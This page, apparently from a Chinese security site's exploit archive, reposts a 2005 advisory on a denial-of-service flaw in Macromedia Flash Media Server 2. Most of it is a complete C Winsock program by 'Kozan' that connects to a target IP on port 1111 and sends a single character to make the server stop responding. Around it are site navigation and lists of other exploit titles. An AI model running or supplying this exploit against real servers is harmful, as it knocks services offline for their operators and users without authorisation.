首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Macromedia Flash Media Server DoS
来源:www.spyinstructors.com 作者:Kozan 发布时间:2005-12-23  

Macromedia Flash Media Server DoS (Exploit, Single Character)

Summary
"Macromedia Flash Media Server 2 software offers the unique combination of traditional streaming media capabilities and a flexible development environment for creating and delivering innovative, interactive media applications to the broadest possible audience."

A vulnerability in Macromedia Flash Media Server allows remote attackers to cause the server to no longer respond to legitimate requests.

Credit:
The information has been provided by Kozan.

Details
Vulnerable Systems:
* Macromedia Flash Media Server 2

Exploit:
/*********************************

Macromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan

Application: Macromedia Flash Media Server
http://www.macromedia.com/software/flashmediaserver/
Vendor: Macromedia

Discovered by: dr_insane
Exploit Coded by: Kozan
Credits to ATmaCA, dr_insane
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

*********************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>

#pragma comment(lib,"ws2_32.lib")

int nDefaultPort = 1111;

char SingleDoSChar[] = "\x41";

int main(int argc, char *argv[])
{
fprintf(stdout, "\n\nMacromedia Flash Media Server 2 Remote D.o.S Exploit by Kozan\n");
fprintf(stdout, "Bug Discovered by: dr_insane\n");
fprintf(stdout, "Exploit Coded by: Kozan\n");
fprintf(stdout, "Credits to ATmaCA, dr_insane\n");
fprintf(stdout, "www.spyinstructors.com - kozan@spyinstructors.com\n\n");

if(argc<2)
{
fprintf(stderr, "Usage: %s [Target IP]\n\n", argv[0]);
return -1;
}
WSADATA wsaData;
SOCKET sock;

if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!\n");
return -1;
}

sock = socket(AF_INET,SOCK_STREAM,0);
if( sock == -1 )
{
fprintf(stderr, "Socket error!\n");
return -1;
}

struct sockaddr_in addr;

addr.sin_family = AF_INET;
addr.sin_port = htons(nDefaultPort);
addr.sin_addr.s_addr = inet_addr(argv[1]);
memset(&(addr.sin_zero), '\0', 8);

fprintf(stdout, "Please wait while connecting to server...\n");

if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
{
fprintf(stderr, "Connection failed!\n");
closesocket(sock);
return -1;
}

fprintf(stdout, "Please wait while sending single DoS char...\n");

if( send(sock,SingleDoSChar,lstrlen(SingleDoSChar),0) == -1 )
{
fprintf(stderr, "DoS char could not sent!\n");
closesocket(sock);
return -1;
}

fprintf(stdout, "Operation completed...\n");
closesocket(sock);
WSACleanup();

return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Eudora Qualcomm WorldMail LIST
·Mailenable Enterprise Examine
·Microsoft IIS Malformed HTTP R
·GoldenFTPd APPE Stack Overflow
·Mailenable Enterprise EXAMINE
·samba-2.2.8 < remote root e
·Flatnuke Authentication Bypass
·wu_ftpd <=2.6.1 remote root
·Mercury Mail Transport System
·GKrellM Vulnerable to Remotely
·Oracle XDB HTTP PASS Overflow
·identd 1.2 remote exploit
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved